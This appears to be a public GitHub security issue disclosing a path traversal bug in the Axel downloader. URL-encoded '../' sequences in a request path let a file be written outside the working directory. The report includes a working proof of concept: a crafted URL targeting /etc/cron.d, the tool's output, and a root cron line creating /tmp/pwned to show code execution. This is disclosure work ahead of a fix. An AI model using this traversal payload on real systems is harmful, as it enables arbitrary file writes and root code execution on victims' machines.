Arbitrary File Write in Axel via Path Traversal in Request Path when no --output option is provided #469
Description
I'm opening a public issue since it's the only option, according to @ismaell
While Content-Disposition response header parsing takes special characters into account, such as slashes, to prevent path traversal writes in the filesystem, when a specially crafted URL is provided and no output option is provided, it's possible to write a file in an arbitrary location.
Steps to reproduce:
- Run the provided flask app afw-rce-poc.py
- Run Axel to fetch a URL with URL-encoded slashes
- Observe that it's possible to achieve remote code execution (cron job used for demonstration purposes)
root@machine:~/axel# ./axel "http://localhost/..%2f..%2f..%2f..%2fetc%2fcron.d%2ftest"
Initializing download: http://localhost/..%2f..%2f..%2f..%2fetc%2fcron.d%2ftest
File size: 32 byte(s) (32 bytes)
Opening output file ../../../../etc/cron.d/test
Server unsupported, starting from scratch with one connection.
Starting download
[100%] [.....................................................................................................................................................................................] [ 319.0B/s]
Downloaded 32 byte(s) in 0 second(s). (0.31 KB/s)
root@machine:~/axel# cat ../../../../etc/cron.d/test
* * * * * root touch /tmp/pwned
root@machine:~/axel# file /tmp/pwned
/tmp/pwned: cannot open `/tmp/pwned' (No such file or directory)
root@machine:~/axel# date
Tue Dec 23 13:47:51 UTC 2025
root@machine:~/axel# file /tmp/pwned
/tmp/pwned: empty
root@machine:~/axel# date
Tue Dec 23 13:48:04 UTC 2025Will open a PR shortly to address this security issue.